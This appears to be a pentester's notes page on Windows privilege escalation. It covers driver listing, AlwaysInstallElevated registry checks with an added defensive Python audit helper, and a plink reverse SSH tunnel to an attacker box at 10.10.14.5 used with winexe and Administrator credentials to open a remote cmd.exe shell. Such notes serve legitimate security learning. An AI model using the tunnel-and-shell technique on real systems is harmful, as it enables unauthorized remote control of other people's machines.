Misc

Vulnerable Drivers

Some drivers might be vulnerable. I don't know how to check this in an efficient way.

# List all drivers
driverquery

AlwaysInstallElevated

# AlwaysInstallElevated is a value, not a key, so it must be queried with /v;
# the policy only takes effect when BOTH values are set to 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
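To evaluate what the two queries above return, here is an added example (not part of the original page): a small Python audit helper that parses `reg query` output, reports whether the policy is effectively enabled (both hives must be 1) and lists the `reg add` commands that clear it. The sample outputs are constructed, and the `query_live` wrapper that runs the queries on a Windows host is an assumption of this example.

```python
import re
import subprocess
import sys

# The two policy values the page queries. Windows Installer honours the policy
# only when BOTH are REG_DWORD 0x1; one hive alone is not enough.
POLICY_KEYS = {
    "HKLM": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer",
}
# A value line as reg.exe prints it: "    AlwaysInstallElevated    REG_DWORD    0x1"
VALUE_LINE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.M)

# Constructed sample outputs (not captured from a real host).
SAMPLE_ENABLED = ("\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
                  "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n")
SAMPLE_DISABLED = SAMPLE_ENABLED.replace("0x1", "0x0")
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value.\r\n"

def parse_reg_query(output):
    """DWORD value from one `reg query` output, or None when the key/value is absent."""
    match = VALUE_LINE.search(output)
    return int(match.group(1), 16) if match else None

def assess(hklm_output, hkcu_output):
    """Verdict for both hives plus the remediation a defender would apply."""
    hklm, hkcu = parse_reg_query(hklm_output), parse_reg_query(hkcu_output)
    enabled = hklm == 1 and hkcu == 1
    verdict = {"hklm": hklm, "hkcu": hkcu, "effective": enabled, "remediation": []}
    if enabled:
        # Clearing either hive closes the hole; clear both so a later change to
        # one of them cannot silently re-enable it.
        verdict["remediation"] = [f"reg add {key} /v AlwaysInstallElevated /t REG_DWORD /d 0 /f"
                                  for key in POLICY_KEYS.values()]
    return verdict

def query_live():
    """Run the two reg queries from the page on the current Windows host (assumed wrapper)."""
    if not sys.platform.startswith("win"):
        raise RuntimeError("reg.exe is only available on Windows")
    outputs = {}
    for hive, key in POLICY_KEYS.items():
        proc = subprocess.run(["reg", "query", key, "/v", "AlwaysInstallElevated"],
                              capture_output=True, text=True)
        outputs[hive] = proc.stdout + proc.stderr  # a missing key is reported on stderr
    return assess(outputs["HKLM"], outputs["HKCU"])

if __name__ == "__main__":
    print(assess(SAMPLE_ENABLED, SAMPLE_MISSING))  # HKLM alone is not exploitable
```

Setting the policy to 0 in both hives (or disabling "Always install with elevated privileges" in Group Policy) is the fix; the check is worth adding to a baseline audit because the HKCU half can be changed by the user's own logon scripts or GPO.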

Port forwarding

We can run an SSH server on our Kali Linux box and have the Windows host connect back to it, so that the tunnel carries traffic in the other direction.

  • plink.exe: The command-line interface for the PuTTY SSH client, used here on a Windows system.

  • -l root: Specifies the login name as "root".

  • -pw toor: Provides the password "toor" for authentication.

  • -R 445:127.0.0.1:445: Sets up a remote port forwarding tunnel. It tells the SSH server (Kali) to listen on port 445 and forward any traffic received there back to port 445 on the Windows machine that started the connection.

  • 10.10.14.5: The destination IP address of the SSH server where the tunnel is being established.

  • winexe: A GNU/Linux tool used to execute commands remotely on Windows operating systems.

  • -U Administrator%Welcome1!: Specifies the credentials for authentication.

    • Administrator: The target username.

    • %: The separator used between the username and password.

    • Welcome1!: The password for the Administrator account.

  • //127.0.0.1: The target address. Here it points to the local loopback address because the connection is carried through the port forwarding tunnel set up with plink above.

  • "cmd.exe": The specific command or executable to be run on the remote Windows machine.

Utility

The primary utility of this command is remote command execution on a Windows system from a Linux environment.

By targeting 127.0.0.1, the user is relying on the established SSH tunnel to carry SMB traffic back to the Windows host. This gives an administrator (or a penetration tester) an interactive command-line shell (cmd.exe) on the Windows target without needing a graphical interface like RDP.
